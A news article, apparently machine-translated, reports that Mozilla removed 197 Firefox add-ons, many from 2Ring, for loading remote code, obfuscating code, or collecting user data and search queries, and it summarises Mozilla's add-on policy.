Without a doubt one of the most appreciated features by users in web browsers is the ability to add extensions, thereby expanding the basic functionality of browsers to provide users with a personalized web experience.
Although not all the users like them because of the use of extensions, since the use of these increases the memory consumption of the browser in the system, in addition to there have been many cases in which I extended thems are often used to extract user data.
And as we well know, Mozilla in the last months has implemented a fairly strict policy for add-ons, in which it has restricted the use of certain practices in them, of which it focuses on prohibiting add-ons with embedded code, since most of these tend to embed malicious code.
According to Mozilla, extensions developed for your browser must adhere to strict guidelines and meet technical requirements so as not to compromise browser security. Among others, they:
- It should not contain hidden code.
- It must be autonomous and not load remote code for execution.
- It should not load or redirect to a new remote tab page. The new tab must be contained in the plugin.
- You must use encrypted channels to send confidential user data.
- It should not have a negative impact on the performance or stability of Firefox.
- It should be written in a way that is reviewable and understandable. Reviewers may ask you to review parts of the code if it is not reviewable.
With that, In the last two weeks, the Mozilla team discovered that 197 add-ons from the addons.mozilla.org (AMO) directory andrun code downloaded from third party sites that transfer confidential data to external servers, perform malicious acts or use methods to obfuscate the source code.
The vast majority of malicious extensions that have been discovered (129 to be exact) They have been developed by 2Ring, a B2B software provider.
These plugins were removed, because they downloaded and ran code from an external server (AMO directory rules prohibit dynamic loading of executable parts).
For the same reason, six accessories have been eliminated from Tamo Conjunto Caixa and three accessories with counterfeits of famous products.
And a plugin called FromDocToPDF was removed because it was loading remote content on the new tab page in Firefox.
In relation to the transfer of user data, the additions of Rolimons Plus, RoliTrade, Pdfviewer, WeatherPool, Your Social and another addition without a detailed name. A module called Fake Youtube Downloader was also removed because it was trying to install other malware.
EasySearch for Firefox, EasyZipTab, FlixTab, ConvertToPDF and FlixTab (search plugins) are blocked from collecting and transmitting information about search queries.
Another 14 additions (name not specified) are blocked for the use of code obfuscation techniques and 30 extensions were also banned because they exhibited malicious behavior on third-party websites.
Extensions like EasySearch, EasyZipTab, FlixTab, ConvertToPDF and FlixTab Search have been banned from the Mozilla platform because they collect or intercept search terms of the users. The WeatherPool and Your Social extensions, PDFviewer-tools, RoliTrade and Rolimons Plus were also banned due to their illegal collection of user data. Other modules whose names have not been exposed have also been removed due to the malicious nature detected.
In addition to removing recently discovered malicious extensions on your platform, Mozilla has also disabled these extensions in browsers of users who have already installed them.
On the Bugzilla platform, the browser security team reported the IDs of the blocked or removed plugins so that developers of accessories can appeal the ban after removing the malicious behavior.
Appeal I already made the developer of the Like4Like extension, as it had also been blocked due to the collection or presentation of credentials or tokens from social networking websites to another website, but the appeal process was successful and is once again available on the Firefox extensions platform.
excellent ... this is how the implementation of privacy policies help users.